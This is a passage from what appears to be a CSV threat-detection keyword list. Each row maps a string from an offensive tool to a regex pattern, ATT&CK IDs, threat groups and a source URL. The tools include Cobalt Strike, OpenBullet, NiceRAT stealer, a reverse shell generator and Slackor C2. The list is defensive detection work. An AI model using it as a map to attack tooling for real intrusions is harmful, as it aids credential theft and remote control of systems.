Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe/secrets*",".{0,1000}onionpipe\/secrets.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe/tor*",".{0,1000}onionpipe\/tor.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe-darwin-amd64-static*",".{0,1000}onionpipe\-darwin\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe-linux-amd64-static*",".{0,1000}onionpipe\-linux\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*OnionScan*",".{0,1000}OnionScan.{0,1000}","offensive_tool_keyword","onionscan","OnionScan has two primary goals: We want to help operators of hidden services find and fix operational security issues with their services. We want to help them detect misconfigurations and we want to inspire a new generation of anonymity engineering projects to help make the world a more private place. Secondly we want to help researchers and investigators monitor and track Dark Web sites. In fact we want to make this as easy as possible. Not because we agree with the goals and motives of every investigation force out there - most often we don't. But by making these kinds of investigations easy. we hope to create a powerful incentive for new anonymity technology","T1589 - T1591 - T1596 - T1599","TA0011 - TA0012","N/A","N/A","Information Gathering","https://onionscan.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Online - Reverse Shell Generator*",".{0,1000}Online\s\-\sReverse\sShell\sGenerator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*online_brute.gz.torrent*",".{0,1000}online_brute\.gz\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*ookjlbkiijinhpmnjffcofjonbfbgaoc*",".{0,1000}ookjlbkiijinhpmnjffcofjonbfbgaoc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*opcgpfmipidbgpenhmajoajpbobppdil*",".{0,1000}opcgpfmipidbgpenhmajoajpbobppdil.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openbsd_softraid2john.py*",".{0,1000}openbsd_softraid2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*OpenBullet.csproj*",".{0,1000}OpenBullet\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.exe*",".{0,1000}OpenBullet\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.pdb*",".{0,1000}OpenBullet\.pdb.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.sln*",".{0,1000}OpenBullet\.sln.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.zip*",".{0,1000}OpenBullet\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openbullet/openbullet*",".{0,1000}openbullet\/openbullet.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet2.Console.zip*",".{0,1000}OpenBullet2\.Console\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2.Native.exe*",".{0,1000}OpenBullet2\.Native\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2.Native.zip*",".{0,1000}OpenBullet2\.Native\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2.zip*",".{0,1000}OpenBullet2\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*openbullet2:latest*",".{0,1000}openbullet2\:latest.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2-master*",".{0,1000}OpenBullet2\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBulletApp.cs*",".{0,1000}OpenBulletApp\.cs.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.csproj*",".{0,1000}OpenBulletCLI\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.exe*",".{0,1000}OpenBulletCLI\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openbullet-master*",".{0,1000}openbullet\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*opencubicles/h8mail*",".{0,1000}opencubicles\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*OPENCYBER-FR/RustHound*",".{0,1000}OPENCYBER\-FR\/RustHound.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*openGoldenTicketDialog*",".{0,1000}openGoldenTicketDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Opening PSEXEC shell at *",".{0,1000}Opening\sPSEXEC\sshell\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*openKeystrokeBrowser*",".{0,1000}openKeystrokeBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openPayloadGenerator*",".{0,1000}openPayloadGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openPayloadGeneratorDialog*",".{0,1000}openPayloadGeneratorDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openPayloadHelper*",".{0,1000}openPayloadHelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 